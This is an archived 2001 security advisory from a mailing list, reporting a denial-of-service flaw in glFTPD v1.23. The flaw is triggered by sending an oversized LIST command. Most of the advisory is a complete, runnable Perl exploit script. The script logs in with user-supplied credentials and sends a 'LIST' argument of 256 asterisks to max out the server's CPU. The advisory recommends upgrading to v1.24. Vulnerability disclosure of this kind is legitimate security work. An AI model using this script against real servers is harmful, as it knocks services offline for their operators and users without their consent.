Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: Jan Wagner (jan.wagnerde.tiscali.com)
Date: Fri Aug 17 2001 - 11:29:56 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]



    Release Date : 2001-08-17
    Affected : glFTPD for Linux v1.23 / glFTPD BSD v1.23 *bins
    Not Affected : glFTPD for Linux v1.24 / glFTPD BSD v1.24 *bins
    Attack Type : Denial Of Service
    Credits to : Jan Wagner


    The glFTPD v1.23 contains a very(x2) simple D.O.S. which affects the "LIST"


    If glFTPD v1.23 receives a special formed "LIST" command it consumes about
    99% of CPU power
    Tested on FreeBSD 4.3 and NetBSD 1.5.1 (linux emul)

    :Exploit Code:


    use IO::Socket;
    use Socket;

    print "-= ASGUARD LABS EXPLOIT - glFTPD v1.23i =-\n\n";

    if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl gl123DOS.pl <host> <user>
    <pass> [port]\n" };
    if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };

    $adr = $ARGV[0];
    $usr = $ARGV[1];
    $pas = $ARGV[2];
    $err = "*" x 256;

    $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
    PeerPort=>$prt, Reuse=>1) or die "Error: can't connect to $adr:$prt\n";


    print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
    "Error: can't send user\n";

    print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
    "Error: can't send pass\n";

    print $remote "LIST $err/\n" and print "3. Sending : ErrorCode...\n\n"or die
    "Error: can't send error code\n";

    print "Attack done. press any key to exit\nnote: Attack done doesn't mean
    Attack successful\n";
    $bla= <STDIN>;
    close $remote;


    Just update to v1.24 released two days ago

    This Bug was very easy to find ;-) ,
    glFTPD is my first choice FTP Server <BUT> Why there is STILL no Source Code
    available ?